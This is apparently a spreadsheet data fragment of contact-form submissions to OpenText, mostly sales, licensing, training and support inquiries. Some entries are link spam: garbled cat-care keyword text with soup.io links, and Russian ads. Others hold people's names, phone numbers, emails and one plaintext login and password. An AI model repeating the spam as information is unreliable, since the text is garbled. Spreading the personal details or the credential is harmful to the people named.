  [url=http://64grandiasol-he4g.soup.io/]Afl results tonight[/url] [url=http://292diadengeo-takx.soup.io/]What gets rid of cat wee smell[/url]  _x000D_
 Microscopicbloodinurineunreliable indicator of urinary ... Your browser indicatees if youve visited this link Microscolicamounts ofbloodinurinehave been considered a risk factor for urinary tract malignant tumors. However, only a small proportion of patients referred for ... More results. LitterBoxes &amp; Enclosures - Your browser indicates if youve visited this link.  _x000D_
why do older cats pee outside littwr box _x000D_
 _x000D_
Blood inCatUrine :WhatDoes it Mean? - Pet Health Network Your browseer indicates if youve</t>
  </si>
  <si>
    <t xml:space="preserve">Maintenance for VIM with SAP contract how to get the latest version Vendor Invoice Management 7.5 Support Package 6? </t>
  </si>
  <si>
    <t xml:space="preserve">Team,_x000D_
I having a acquisition  phase , Company A is taking Company B, Compnay A has Right fax and B has Xmeduis fax, Do u have a migration solution from Xmeduis to right fax </t>
  </si>
  <si>
    <t xml:space="preserve">Jan 01,2015, Thailand Revenue Department issued new VAT legislations regarding preparation of tax invoices and VAT reports. These new regulations order tax payers to display tax ID number and branch number in every single full tax invoice including debit or credit notes as well as input and output VAT reports_x000D_
_x000D_
Will Open text will have any update for this local requirement?_x000D_
When will you do it?_x000D_
 FYI: Our VIM Version use is OTEXVIM release 7.5 SP-level 0004 (SAPK-75004INOTEXVIM) _x000D_
_x000D_
Thanks and Regards,_x000D_
_x000D_
Phonraphat Kulnoi_x000D_
</t>
  </si>
  <si>
    <t>Regarding OpenText Content Server Training (Course Name: 1-0101): Location is mentioned as Virtual Classroom - Asia Pacific. Kindly let me know the procedure and cost to take this training. _x000D_
Thanks,_x000D_
Mahesh</t>
  </si>
  <si>
    <t>SUBJECT: Request for Assistance_x000D_
Aiqon Reference No.204174_x000D_
ATTENTION:  OPEN TEXT PHILIPPINES_x000D_
_x000D_
Gentlemen:_x000D_
 _x000D_
We have been trying to get in touch with AGUILA KRISTINE HAZEL ADAO through his last known contact details and address in our records however much to our dismay, we have not been successful in this endeavour._x000D_
_x000D_
We have recently received information that said person is presently employed with your good office. We hope to communicate with him on an urgent and confidential matter requiring his immediate attention._x000D_
_x000D_
In this regard, we would be most grateful if your office could advise us on any relevant information such as his current whereabouts and/or contact numbers which may help us re-establish communication with said person._x000D_
_x000D_
We may be contacted at (02) 621-5370 / (0915) 7917267 / (0921) 5870796 / (0925) 4912452._x000D_
_x000D_
Please acknowledge receipt hereof by sending a reply e-mail. _x000D_
_x000D_
Thank you and have a nice day!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Kath Bocalan_x000D_
Manager_x000D_
_x000D_
Aiqon Unicorp Inc_x000D_
1201 Orient Square Bldg_x000D_
F. Ortigas Jr. Road, Ortigas Centre_x000D_
Pasig City 1605          </t>
  </si>
  <si>
    <t xml:space="preserve">We would like to receive a price quote. Please email me so I can provide you with the details. Thank You. </t>
  </si>
  <si>
    <t xml:space="preserve"> How do you keep cats out of your yard? You amy want to repel cats to protect birds. You may want to keep your cats and other pets away from wandering cats. Or, you to Repel Feral Cats Cat Repellent HavahartВ® US. Rabies is a severe infection that can affect cats. Learn more about rabiessymptoms , causes, &amp; whether or not you can get it from a cat scratch onpetMD ..  _x000D_
 [url=http://myagehartcreatezprod.soup.io]Anxiety disorders cats baltimore[/url] [url=http://credusincaezlie.soup.io]Outdoor cat house mcallen[/url]  _x000D_
 Shelter Creates Purr-fect Solution ForCatWho Loves to bee Held. How do i stop a fixed,femalecatfrom peeing no the rug? ... Cant stop yourcatpeeing ni thehouse ? Then worry no ... finicky andorfemalecats , this to Get SpayedCastto Stop Peeing in theHouse- Pets Your browser indicates if youve visited this link.  _x000D_
boundary spray for cats _x000D_
 _x000D_
 Getting Pet Urine Odor out of a MicrofiberCouchвЂў Charleston ... Your browser indicates if youve visited this link If you found this post on Pinterest, welcome! If you are looking for more great pet ideas (we have a cat and adog !) check out all of our pet projects here and also ... More results. The Geelong Football Club, nicknamed the Cats, is a professional Austyralian rules football club based in the city of Geelong, Australia and playing in the Australian Geelong Football Club - Wikipedia .  _x000D_
  [url=http://cailkeepmindca1972.soup.io/]Stud 100 online shopping[/url] [url=http://poetinnepaezserv.soup.io/]Crazy cat stories victorville[/url]  _x000D_
 CatAnti Anxiety forCats- GregRoberr Yor browser indicates if youve visited this link. Feline Urinary Tract InfectionHomeRemedies - Your browser indicates if youve visxited this link The urinary tarct infectionhomeremedies may be used instead of the aggressive antibiotic treatments tha ... The urinary tract infection ... Caring for theCat. More results.  _x000D_
best kitten litter brand _x000D_
 _x000D_
STRIPED , SPOTTED AND TICKED CATS ... in August 1995 th SomaliCatBreedAdvisory Committe</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently evaluating for a  oil &amp; gas company Colombian  the option of use Exceed OnDemand for the Openworks application -Halliburton for 15 users._x000D_
We want to know the cost of these licenses and  the requirements of software and hardware._x000D_
_x000D_
Regards,_x000D_
Pedro Ibanez_x000D_
Oil &amp; Gas Consultant_x000D_
</t>
  </si>
  <si>
    <t>I'm a research associate at Stax Consulting. We're doing a technology review for a retail customer who is planning to overhaul their IT infrastructure. They have an older VAN system in place but are interested in modernizing as well as investing in an increased eCommerce presence and drop-shipping opportunities. I was hoping to discuss Opentext's services so that I can present them as an option to our client. I can be reached at the email above or via phone at 617-747-3428.</t>
  </si>
  <si>
    <t>Need a quote for Exceed OpenText for 7 Servers</t>
  </si>
  <si>
    <t>First I would like to get the full access so I can look our stuff up.  Currently I am trying to resolve an issue with Coke.  they are telling us they sent us a 204 tender but we have not received it.  I would like to see the data they are sending as we have all their other tenders just not that one.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in discussing potentially utilizing OpenText for new business processing of insurance applications. </t>
  </si>
  <si>
    <t>need price for catalog- working with Kohl's.  We have about 400 SKU's total, listing about 200 items with Kohl's.  Contact my mobile OK:  917-215-5781</t>
  </si>
  <si>
    <t xml:space="preserve">I am in need of obtaining some information on the build out of a web portal as a centralized point of contact for all of the policies and procedures for the  Financial Crimes division of Wells Fargo.   </t>
  </si>
  <si>
    <t>I'm looking at attending the 2018 OpenText World Conference.  I'm interested in learning about what changes will be coming with the latest Exstream Dialogue software, and what the future plans it has now that OpenText has bought this software._x000D_
Will there be any focus on this software at this conference?_x000D_
Will there be any workshops specifically for Exstream Dialogue?_x000D_
_x000D_
Thanks,_x000D_
Russell Squire _x000D_
435-535-6038</t>
  </si>
  <si>
    <t xml:space="preserve">One of my clients is hoping to purchase a content management solution for HR personnel files/records in 2018.  OpenText is one of the solutions on their radar to be explored during requirements and vendor selection in 2018. They currently have a project underway (as a precursor to content management solution selection) to clean up their current file management processes, because many items are being saved/stored on network share drives in folders, and others are printed out and saved in hard copy.  They are trying to decide whether or not to print everything out and file as hard copy in the interim (before licensing and launching content management solution) or to save everything electronically on their network.  I would like to learn more about the processes OpenText uses for migrating electronic records (i.e., scans, PDFs and some Word docs) and paper records during conversion.  In other words, I'm hoping we can make some file management/storage decisions now that will lead to a more efficient conversion to OpenText in the future. _x000D_
Thank you in advance for your assistance,_x000D_
Bernadette Mitchell </t>
  </si>
  <si>
    <t>I completed the I took the “U-TR-2-0106 Content Server Information Administration v16” course at Enterprise World this year in Toronto and was never given a Certificate or any proof showing that I completed it. Is there anyway I could be sent a certificate or show that I completed this training? I looked in the back of my binder/book which is where others have said it was in previous years and there is nothing. I completed the training in July 2017.</t>
  </si>
  <si>
    <t>I received a link to download brava desktop CXL 16.2 that we purchase and having difficult obtain it to install on the pc.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am Anushree.S a BE graduate(CS) kindly let me know if there are openings in technical field._x000D_
Thank you in advance</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring contact list of :_x000D_
_x000D_
Chief Marketing Officers,_x000D_
Web Directors, Webmasters and Web Team Members,_x000D_
Vice Presidents of Marketing,_x000D_
Chief Information Officers,_x000D_
Chief Technology Officers,_x000D_
Marketing &amp; Communications Directors,_x000D_
CRM Managers, Data Analysts,_x000D_
Public Relations Directors,_x000D_
Business Development Executives,_x000D_
IT Professionals,_x000D_
Physician Relations Directors,_x000D_
Strategic Planners,_x000D_
other and many more across US/UK/CANADA/Australia/New Zealand/Singapore._x000D_
_x000D_
Let me know the geography and industry you are looking for and I’ll run the counts and send few unpaid samples for your review._x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Regards,_x000D_
Kiyara James</t>
  </si>
  <si>
    <t>Hi;_x000D_
we are interested in setting up a demo system for our customers, ¿how can we download opentext to integrate it with SAP?</t>
  </si>
  <si>
    <t xml:space="preserve">HI, _x000D_
Can I have autorisation to create tickets, please? _x000D_
_x000D_
Regards, _x000D_
Marianne </t>
  </si>
  <si>
    <t>Hey, We are currently using asset libraries from Cellum and Adam. The Cellum instances aren't supported anymore by the vendor. That's why we are evaluating a move to another product. would like to have a demo of the cloud product. thanks,</t>
  </si>
  <si>
    <t>app extender documentum purchase</t>
  </si>
  <si>
    <t xml:space="preserve">gostariamos de receber infos sobre automacao de extracao de dados de invoices baseado na solucao opentext invoice capture center. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a document storage service in the cloud to eliminate the need for paper employee security files and location files. My FSO previously used Documentum when she worked at SAIC, so she suggested I start my research with you. _x000D_
I'm not sure how something like this is priced out but we would probably need 6-10 users to have access to the files and storing around 5,000 employee files. These are just estimates to give us a starting point. _x000D_
_x000D_
I'm in and out of my office throughout the day so email is the best contact method initially and we can schedule a call if needed. _x000D_
_x000D_
Thanks_x000D_
Chris_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">Demo of product to internal group </t>
  </si>
  <si>
    <t>Account Development Representative Vacancy</t>
  </si>
  <si>
    <t>We are trying to download OpenText Content Server 16.0.0 according to instructions available in "OpenText Imaging Reviews and Notes_x000D_
Release Notes_x000D_
16.0.0.pdf " but when we access the link https://knowledge.opentext.com/knowledge/llisapi.dll/Open/62369812 we receive a message that tells us that our account does not have permissions to access such documentation and requests confirmation of the account via email. We have performed the operation several times but we still can not access the SW download.</t>
  </si>
  <si>
    <t>we want migrate Forms 10g to ADF. Please share us high level approach and let me know do you need addiitional inputs.</t>
  </si>
  <si>
    <t>Understand OpenText DAM solution and also check if it can meet our requirement</t>
  </si>
  <si>
    <t>Enquiries on how to become a certified openText reseller</t>
  </si>
  <si>
    <t>Hi,_x000D_
I understand that you have are an OEM integration partner with bluesoftware via vproof review and annotation tool for OTMM._x000D_
I'm guessing this integration works pretty close to being OOTB. However, if someone was looking to use Conceptshare as an alternative, would there be a minimal integration work based on Opentext's history with them, (I think they were your past OEM before vproof). ?_x000D_
Reason I'm asking is to gauge if a Conceptshare integration would be fairly straight forward and lower than average cost because the methods to integrate Conceptshare with Opentext are likely well known._x000D_
_x000D_
As well, could reviews be listed as a task in OTMM even if using Conceptshare instead of vProof?_x000D_
_x000D_
thanks_x000D_
Tony Welter</t>
  </si>
  <si>
    <t>Good morning, _x000D_
_x000D_
My name is Eliseu Kaleniuk and I work at Targetware Informatica, a Brazilian software reseller company located in Sao Paulo. One of our customers is interested in a license of your software, do you work with resellers? If so, could you please help me with the quote below?_x000D_
_x000D_
Product: OpenText Gupta Team Developer_x000D_
Quantity: 05_x000D_
License:  Commercial_x000D_
Platform: Windows_x000D_
_x000D_
How does the software delivered? _x000D_
_x000D_
Which payment methods do you accept?_x000D_
_x000D_
I look forward to seeing your answer._x000D_
_x000D_
Best Regards,_x000D_
Eliseu Kaleniuk</t>
  </si>
  <si>
    <t>В наше трудное время сложно выделить время на посещение салона красоты, надо знать лучший салон города учитывать то как там работают, все ли там стерилизуют: маникюр. Мы приглашаем девушек в наш салон на дому для наращивание ногтей. Тяжело в нашем мире без ухода за сабой,приходите в нашспа центр на домугде вы получите все виды ухода за ногтями рук и ног. _x000D_
 _x000D_
Я работаем на дому ценю всякого своих клиентом делаювсе качественно и аккуратно. Следим за стерильностью приборов которыми работаю во время **ман.пед и так дал*. _x000D_
 _x000D_
Мой салон педекюра не только для дам, но и для его второй половинки. _x000D_
Я сделаю комплекс процедур таких как укрепление ногтей. _x000D_
 _x000D_
Наш спа горжусь своим первокласным обслуживанием. _x000D_
я помогаю сделать модный ногтевой сервис. _x000D_
 _x000D_
Цены в нашем спа центре малые и по карману всем и каждому. К нам в салон можно записаться по телефону. Имеем все сертификаты на работу и по качеству всех приборов. _x000D_
 _x000D_
Специалист педикюра - [url=https://mzezina.ru/]МАНИКЮР ГЕЛЬ ЛАКОМ[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are currently looking for a tool to recognize the MICR line in bank check images. I saw on your website that your product Opentext Capture Center is able to do data extraction on checks, so I’m contacting you to ask for more information._x000D_
Does your tool works on photos of checks ?_x000D_
Can it recognize MICR lines in CMC-7 font ?_x000D_
We expect to process about 10 millions documents per year, how much would it cost to use Opentext Capture Center ?_x000D_
_x000D_
Thank you, _x000D_
_x000D_
Chloé A. C. Comparetti_x000D_
R&amp;D engineer, AriadNEXT</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Support Team, _x000D_
_x000D_
I'm not able to open a ticket. _x000D_
I have an issue to install the Open Text Mbpm9.5 on win server 2012 Rs Standard._x000D_
Please your advice._x000D_
Thanks,_x000D_
Assaf Ram._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> The Science Behind theFur : What Makes lBackCatsBlack ... Your browser indicates if youve visited this link. CatScratchDisease FAQs - Centers for Disease Control (CDC) Your browser indicates if youve visited this link Bartonella bacteria cause several diseases in humans. The thrtee most common arecatsscratchdisease, caused by B. heneslae; trench fever, caused by B. quintana; and ... More results.  _x000D_
 [url=http://30tranegscor-ru0l.soup.io/]Get stains out of mattress[/url] [url=http://56ditovir-yoxx.soup.io/]Male cat neutering aftercare[/url]  _x000D_
 Keep your cat entertained with the wide variety of toys from Pets At Home including wand toys, fishing teasers, mice toys, dangling tassels and much more. BuyCATConstruction ExpressTrainSetfrom our Toys for 5-8 years range at Tesco direct. We stock a great range of products at everydazy prices. Cat Iron iesel Motorized Train Set - 55450 eBay.  _x000D_
my cat ran away _x000D_
 _x000D_
 Safe, reilable cat repellants and scratching deterrents keep your cats away from dangerous or sensitive areas, kndoors and out. Stop cat spraying and marking!. female cat spraying everywehre [Online]. Healthy your cat How t Stop!, female cat spraying everywhere :100% Do IStop My Cat From Spraying in the House ?.  _x000D_
  [url=http://15atgancudewk.soup.io/]Exotic domestic cats[/url] [url=http://212trichrinmilzole.soup.io/]New ky duration[/url]  _x000D_
 How to getdogurine out of a sofa, the smell - Yahoo Answers Your browser indicates if youve visited this link Mydogpeed &amp; craped on my sofa and it really smells bad , I have used cleaners, thepeesmell stipl quesitonindex?qid=20071023074941AApkdh5 More results. The Kitty Litter Capital Of The U.S. - CBS News .  _x000D_
get cat pee out of mattress _x000D_
 _x000D_
It Gets Bettre With Age: 5 Reasons to Adopt a Senior Cat - Catster. Results 1 - 20 of 20 -Give yourcatthe stress&amp; anxiety relief she deserves with Petcos selection ofcatpheromones, includingcat camlingcollars, : Comfort Zone with Feliway for Cats Diffuser and Single communicates to y</t>
  </si>
  <si>
    <t>I had account in EMC site and its not migrated properly, even "Reset password" link sent is not working. It throws error message "password update failed". Plesae help!!</t>
  </si>
  <si>
    <t>Hi,_x000D_
We do have privileged access in support.emc.com but our email ids did not migrated with same access in Open Text portal. Please do so._x000D_
My email id jit.narayan.de@ericsson.com</t>
  </si>
  <si>
    <t>Hi_x000D_
We currently have a very bespoke version of VIM 7.0 (and soon 7.5). We are planning some in-house training for our support consultants to give them more of an understanding of the workings of VIM. Nothing as in-depth as the Consultant Bootcamp, but we'd like them to be comfortable in the /OPT/VIM_SPRO transaction. _x000D_
As mentioned, we have a very bespoke solution at the moment, so a lot of the content will be about GSK-specific configuration._x000D_
Could you tell me whether there is any form of breach of contract or other legal ramifications if deliver this training ourselves?_x000D_
Thank you_x000D_
Lyal Schumann</t>
  </si>
  <si>
    <t>Just purchased BRAVA CXL, following the instruction in the email, Icould not download the software and obtain license key.</t>
  </si>
  <si>
    <t>following the instruction of the email to obtain license key, but could not get to the page mentioned in the email. - BRAVA Desktop CXL</t>
  </si>
  <si>
    <t>Betriebsübergang AREVA GmbH zu New NP GmbH - Prüfung Lizenzübertragung _x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
zum 31. Oktober 2017 wird es einen Betriebsübergang von der AREVA GmbH zur New NP GmbH geben. Mit diesem Betriebsübergang werden alle Aktivitäten der AREVA GmbH, inklusive aller dafür notwendigen Betriebsmittel und Mitarbeiter, auf die New NP GmbH übertragen. Die COMPAREX AG betreut die AREVA GmbH im Zuge dieses Betriebsüberganges bei der Übertragung aller Software-Lizenzen und -Verträge. Nähere Infos zu dieser Betriebsübertragung finden Sie anbei im Dokument „Authorization Transfer of Business“._x000D_
_x000D_
Bei der Prüfung des zu übertragenden Software-Lizenzbestandes der AREVA GmbH haben wir auch Softwareprodukte aus Ihrem Haus identifizieren können. Deshalb bitten wir Sie als Geschäftspartner der AREVA GmbH um Unterstützung bei der Übertragung Ihrer Software-Lizenzen von der AREVA GmbH zur New NP GmbH. In Ihrem speziellen Fall handelt es sich um die Software welche über Hummingbird beschafft wurde._x000D_
_x000D_
Hierzu benötigen wir bitte folgende Informationen:_x000D_
_x000D_
•	Ist die Übertragung Ihrer Software-Lizenzen und -Verträge erlaubt, auch wenn es keinerlei Beteiligungsverhältnisse zwischen beiden Unternehmen geben wird?_x000D_
•	Wie gestaltet sich der Prozess der Lizenzübertragung? Gibt es gegebenenfalls Lizenzübertragungs-Dokumente oder Vorlagen, die Sie uns bereitstellen können?_x000D_
_x000D_
_x000D_
Der nächste Schritt bei der Lizenzübertragung wäre nun die Identifizierung der zu übertragenden Lizenzen. Besteht die Möglichkeit, dass Sie uns einen Purchase Report/ eine Kaufstatistik zur Verfügung stellen können? Dieser sollte im besten Fall alle Beschaffungen, die die AREVA GmbH bei Ihnen getätigt hat, abbilden. Alternativ würde es auch ausreichen, wenn Sie uns die Lizenznachweise in Form von Rechnungsnachweisen oder Bestellbestätigungen schicken könnten._x000D_
_x000D_
Ich bedanke mich im Voraus für Ihre Bemühungen und verbleibe _x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Christian Ehnert_x000D_
Consultant Software Asset Manag</t>
  </si>
  <si>
    <t>Sales lead need Opentext sales contact in HK.</t>
  </si>
  <si>
    <t>I am a former employee of Web Systems, Inc. which was bought by Captiva. I have physical stock certificates from Web Systems that I would like to convert or cash out with OpenText. Please contact me on my options. Thank you.</t>
  </si>
  <si>
    <t>Dear Sir/Mam,_x000D_
I take this opportunity to introduce myself. This is Dr. Anil Kumar, in- charge Placement cell of Beant College of Engineering and Technology, Gurdaspur, Punjab. This college is an AICTE approved (Academic Autonomous under UGC act), NBA accredited, NAAC accredited premier institution established by Government of Punjab in 1995. It has become one of the most sought after destinations for the young studentsplanning to shape their future in the ever growing field of engineering and technology. This college is running under graduate courses in Mechanical Engineering, Computer Science &amp; Engineering, Electronics &amp; Communication Engineering, Information Technology, Chemical Engineering and Biotechnology and postgraduate course in Mechanical Engineering (Thermal Engineering) and has a track record of outstanding performances of its pass-outs in different spheres of technical and administrative fields._x000D_
The students of our institute, selected through a rigorous process at entry level, are amongst the best of the technical talent available. They are guided and trained through a constantly updated curriculum, by a highly qualified and experienced faculty to meet the fast changing needs of the technology. Our laboratories are well equipped with modern, sophisticated instruments and machinery. We groom our students, not only in the field of discipline, but also broaden their mindsets and create positive attitude. It is pertinent to mention here that our final year students go for one semester industrial training/ internship from January to June every year. I take this opportunity on behalf of our institute to extend an invitation for participating in campus recruitment drive and tap the nascent talent available. It will be our proud privilege to extend all logistic support and facilities. Looking forward for positive response. For more details please feel free to contact us or visit our college website www.bcetgsp.ac.in_x000D_
 _x000D_
Thanks with Regards</t>
  </si>
  <si>
    <t>Account access issue</t>
  </si>
  <si>
    <t>Good day_x000D_
I need to learn more about supply chain management.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a ticket number 3320467 opened and am receiving no help.  I'm attempting to contact you though other means as my emails and phone calls and messages do not seem to be working._x000D_
_x000D_
It has been more than 9 hours since I contacted support to request assistance and I'm still no closer to resolving this critical issue.  It has been more than 12 hours since I purchased the software and again no closer to obtaining it for use.  I have called and left messages, responded to multiple emails and still I have not gotten any help.  I am very dissatisfied with your company and its support.  I find it shocking that such a simple request can't be completed.  I simply need to download the software and license key that I purchased earlier today.   I find it unacceptable that the automated mechanisms in place will not allow me to complete the support registration and complete downloading the software and obtaining the license key.   You clearly do not have the customer's experience as a priority and your technical support is horrible!_x000D_
_x000D_
Please contact me as soon as possible to get this resolved as the redaction software I'm trying to obtain has a critical business need for our Legal department.   I can be reached at 314-210-1709 or scott.vaccaro@safetynational.com _x000D_
_x000D_
Very frustrated customer. _x000D_
</t>
  </si>
  <si>
    <t>I have following questions for Documentum Web Publisher._x000D_
_x000D_
1. Which all places the database connection string to be updated on the content server/DA etc?_x000D_
2. What tables get updated when the document is published?_x000D_
3. What would happen when we switch from old DB to new DB without migrating the old meta-data?_x000D_
For example DB is migrated from 11g to 12c and we have forgotten to change the connection for 20 days. On 21st day, the app is using the new database without issues. Could you please explain?</t>
  </si>
  <si>
    <t>Привет! _x000D_
НашелИнтересные новости на этом сайте:  http://hellbro.ru : _x000D_
http://hellbro.ru/foto-prikoly-interesnoe/5368-devushki-raznyh-stran-v-proekte-atlas-krasoty.html [b] Девушки разных стран в проекте «Атлас красоты» [/b] _x000D_
[url=http://hellbro.ru/foto-prikoly-interesnoe/1729-kamchatka-zemlya-medvedey.html] Камчатка. Земля медведей [/url] _x000D_
http://hellbro.ru/foto-prikoly-interesnoe/4891-ofis-mechty-shtab-kvartira-yelp.html _x000D_
http://hellbro.ru/foto-prikoly-interesnoe/1820-ot-koshachey-myaty-vshtyrivaet-ne-po-detski.html</t>
  </si>
  <si>
    <t>Our client needs support for large renewal.   We have been unsuccessful to get to the right person and your teams do not know where to send us. _x000D_
_x000D_
Pete</t>
  </si>
  <si>
    <t xml:space="preserve">I represent HOVR, Japan.  We offer solutions for people who sit at their desk for long periods of time, which can eliminate back pain, and leg cramps.  HOVR has been awarded a NEAT designation by Chicago's Mayo Clinic, which make's it more enjoyable for people to sit at their desk for longer periods of time, while it makes a positive impact on productivity.  Please see the video here:   https://www.youtube.com/watch?v=s3_LWKwldhY  and our website on https://www.hovr.co.jp .  We would be delighted to give a demonstration as we have other clients in the Marunouchi Trust Building.  Kindly contact me on ross@hovr.co.jp should you be interested in having a demonstration.   _x000D_
_x000D_
Kind regards, _x000D_
_x000D_
Ross Purdie_x000D_
CEO, Inspired Motion LLC, Tokyo </t>
  </si>
  <si>
    <t>I'm looking for a self pace course for Content Server Fundamental 101. Is instructor lead class the only training available for this course?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to have a report for all workstations that is currently registered for Exstream Designer &amp; Production software that we have._x000D_
SAID: 103483366277_x000D_
Product: Exstream Design &amp; Production_x000D_
</t>
  </si>
  <si>
    <t>Your company caught my eye._x000D_
_x000D_
I partner with companies like yours by providing biz capital/funding._x000D_
_x000D_
Would you be interested in some information about our funding programs?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Lindsey Miller_x000D_
CEO_x000D_
l.miller@themerchantlendr.com_x000D_
themerchantlendr.com_x000D_
(855) 934-6836</t>
  </si>
  <si>
    <t>Support for a Documentum software update.</t>
  </si>
  <si>
    <t>Hello: NW Natural is planning to send out an RFP for composition software and we are interested in Customer Center Experience. Please provide me with the following information:_x000D_
Contact person_x000D_
Phone number_x000D_
Email_x000D_
Street address</t>
  </si>
  <si>
    <t>Looking to move from RightFax to cloud based.  I don't want to pay for hardware and software support on these old brooktrout cards.</t>
  </si>
  <si>
    <t>We are interested in schedule a demo next week on Nov 2 or 3</t>
  </si>
  <si>
    <t>NW Natural is planning to send out an RFP for composition software and we are interested in Omni Channel. Please send me the following information so I can send an RFP._x000D_
Contact Person_x000D_
Email_x000D_
Phone Number_x000D_
Street address</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
My name is Evan Gersonde and I am with the Chicago Dogs, the new Independent baseball team playing out of Rosemont. I was hoping you would be able to get me in contact with the person who heads up any type of client entertainment and/or employee benefits programs, as I would love to discuss any programs that are currently in place, and see how we can work together to supplement and enhance those programs. We work with a number of different companies throughout the area to provide affordable entertainment for clients as well as staff members._x000D_
Feel free to reply to this email or reach out via phone, my direct line is 847-260-2638._x000D_
I look forward to hearing from you!_x000D_
Thank you,_x000D_
Evan</t>
  </si>
  <si>
    <t xml:space="preserve">Everything I click on forces me back to enter my password.  What is going on?  You've got my name on the page, you know who I am.  help?  I would like to review any xPression KB articles, and the latest release notes.  Thanks </t>
  </si>
  <si>
    <t>Gostaria de saber se vocês realizam serviços de comunicação EDI e a confirmação se a Cielo (Administradora de Cartões - Brasil) é cliente._x000D_
_x000D_
_x000D_
I would like to know if you perform EDI communication services and the confirmation if Cielo (Card Manager - Brazil) is a client.</t>
  </si>
  <si>
    <t>Trying to book 5 guests to Enterprise 2018 (Toronto). I'm quoted 695 USD as part of the early-bird rate for one (1) guest, but all the other 4 guests are charged 350 USD. Should I understand that this is a discount rate because I'm registering 5 guests? I want to ensure that all participants will have full access to the conference.</t>
  </si>
  <si>
    <t>I registered my Helix 5 D1 G2  Ser.# 17041702-0810 and am unable to get your website to recognize my email address..  My sigh-in name WAS Bonzo4607  and PW WAS aj4356.  Has it ever been registered??  Why can't I log-in??</t>
  </si>
  <si>
    <t>Need to get a rough order of magnitude quote for budgetary purposes, to implement EDMS at Neuronetics.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a StoryTeller course for experienced StreamServe developers hopefully online but when I select the course 4-3720-eL (OT SS Advanced Document Design in StoryTeller) the web page comes up not found. </t>
  </si>
  <si>
    <t>How can I subscribe for OpenText events notifications.</t>
  </si>
  <si>
    <t>Where can I buy OpenText Products?</t>
  </si>
  <si>
    <t>Why am I unable to access online support?   It keeps saying I don't have access or that I need to confirm by email address.  Of which we have a contract with you and I have confirmed my email address.   Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, i am a reseller working with a state &amp; local entity in Washington.  Can you put me in contact with someone regarding the following?   S-DTOCCULF – KIT Capture Center Unlimited Filed Extraction 50k    TEMPO Box, Content Server Edition </t>
  </si>
  <si>
    <t>I am trying to create an Opentext Account that gives me access to My Support. My account was created using my e-mail address but I still do not have access to My Support. Can you tell me what information is required for this? The product line that I entered is "GCDOCS - Content Server"</t>
  </si>
  <si>
    <t>I would like to get a quote for two licenses each of Exceed and Secure Shell.</t>
  </si>
  <si>
    <t>I'm looking for a corporate solution to enable employees to find the right information in our vast archives and stockpiled info.</t>
  </si>
  <si>
    <t xml:space="preserve">We are trying to select an EDAM vendor for our client and would like to find out more about OTMM's capabilities.  Specifically we wanted to get more details about OpenText's workflow management, search/metadata/taxonomy, asset syndication, asset measurement, and integration options with other Martech platforms (CMS, Social Platform, CRM...etc).  Please can me and we can get on a call to discuss further._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for an on-premise EDI solution to connect via COVISINT (our VAN) and meet General Motors (GM) EDI requirements: DELFOR, DELJIT, DESADV, APERAK etc. and barcode label requirements: GM-1724 A/B/C.  Integration with EPICOR ERP 9.0 is also required.  Please email product details, price quote with timeline for going LIVE with GM.  Thank you.</t>
  </si>
  <si>
    <t>The e-mail you sent looks as fake &amp; phishing like as you can get. I have no idea who or what OpenText is. There is no reference to me or to the company in the e-mail. There is no reference at all as to what I am even taking a survey about. Total failure on your part._x000D_
Who are you &amp; what did I do to get the very shady looking e-mail?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
Would you be interested to acquire an email list of Pharmaceutical, Biotech, Life sciences, Health care and Chemical Industry Professionals across your target region? _x000D_
_x000D_
To name few-  _x000D_
Owner/CEOs/Presidents, Scientist/Chemists, R&amp;D Managers/Directors, Managing Director, VP/Director of Business Development, Program Managers, Marketing &amp; Sales Director, Purchasing Manager and etc..,_x000D_
_x000D_
Should you be targeting any other industry? Please fill the below and let me know your target audience, I will get back to you with counts and pricing details._x000D_
_x000D_
Target Industry: ____________; Geography: ____________; Job Title (Any): ________________:_x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Kevin Cadman | Inside Sales Executive_x000D_
Kevin.cadman@v3dataintel.com_x000D_
We respect your privacy. If you want to stop receiving emails from us, please send a reply with the email subject line as "Leave Out” _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bonjour,_x000D_
Pour un de nos clients nous cherchons un solution pour gérer le processus suivant:_x000D_
1) Distribution de listes d'item à vérifier vers des points de vente_x000D_
2) Vérification des items reçus par chaque points de vente et documentation par l'ajout de pièce justificative (scan ou fichier)_x000D_
3) Contrôle par la centrale des pièces justificatives (après ajout) et marquage de la conformité de l'item_x000D_
4) Contrôle par la centrale des progrès dans les listes d'item_x000D_
_x000D_
Un de vos produits peut-il répondre à ce besoin?_x000D_
Merci,</t>
  </si>
  <si>
    <t xml:space="preserve">I have contacted OpenText a few times unsuccessfully for ProVision licensing and training costs.  Please contact me at hpham@deloitte.com and/or 703-623-0365._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Hieu_x000D_
</t>
  </si>
  <si>
    <t>We are looking to automate our order to cash process and we are looking for a solution to store client's order and request documents, Signed Bill Of Lading and documents coming from our ERP (Invoices, Credit, RMA, EDI)._x000D_
THanks</t>
  </si>
  <si>
    <t>Olá_x000D_
Iniciamos um pré-estudo para substituição de nosso GED de normativos legais e procedimentos, e gostaria de conhecer mais a respeito da solução ECM da Opentext._x000D_
Obrigado</t>
